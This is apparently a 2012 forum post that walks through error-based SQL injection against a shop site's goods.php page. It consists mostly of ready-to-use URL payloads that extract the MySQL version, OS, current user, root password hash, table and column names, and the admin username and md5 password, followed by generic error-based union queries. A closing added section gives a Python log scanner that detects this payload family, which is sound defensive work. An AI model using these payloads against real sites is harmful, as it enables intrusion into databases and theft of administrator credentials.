
Blind injection details

Posted on 2012-9-5 14:59:30
Determine the version number:
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determine the operating system:

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user():

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database():
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root password hash:

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database:

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column of the current database:

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column of the current database:
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (md5):

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection:
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
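As an added example (not part of the original post), a small Python log scanner that flags this payload family in web access logs: every request above relies on the same three building blocks, count(*) plus floor(rand()*2) inside a group by, so the scanner URL-decodes each query string and looks for all three together. The log lines below are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not taken from the post): the first two
# carry the duplicate-key error-based pattern, the third is a normal request.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 512
10.0.0.5 - - [05/Sep/2012:15:01:02 +0800] "GET /goods.php?id=352&wsid=1%20and(select%201%20from(select%20count(*),concat((select%20user()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 512
10.0.0.9 - - [05/Sep/2012:15:02:10 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 8192
"""

# Pull the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# The core of the trick: floor(rand(...)*2) used as a group by key.
RAND_KEY_RE = re.compile(r'floor\s*\(\s*rand\s*\(')
# Secondary indicators showing what the payload was reading.
INTEREST = ('information_schema', 'mysql.user', '@@version')


def normalize(raw_path):
    """Decode the query string once and collapse whitespace, lowercase."""
    query = unquote_plus(urlsplit(raw_path).query)
    return re.sub(r'\s+', ' ', query).lower()


def is_dup_key_injection(query):
    """True when count(*), group by and floor(rand( all appear together."""
    return ('count(*)' in query and 'group by' in query
            and RAND_KEY_RE.search(query) is not None)


def scan_log(text):
    """Return one finding per matching line: line number, client IP, indicators."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = normalize(m.group(1))
        if is_dup_key_injection(q):
            hits.append({'line': lineno, 'ip': line.split()[0],
                         'targets': [t for t in INTEREST if t in q]})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Decoding happens once on purpose; a request that needs double-decoding to reveal the pattern should be flagged separately rather than silently normalised away.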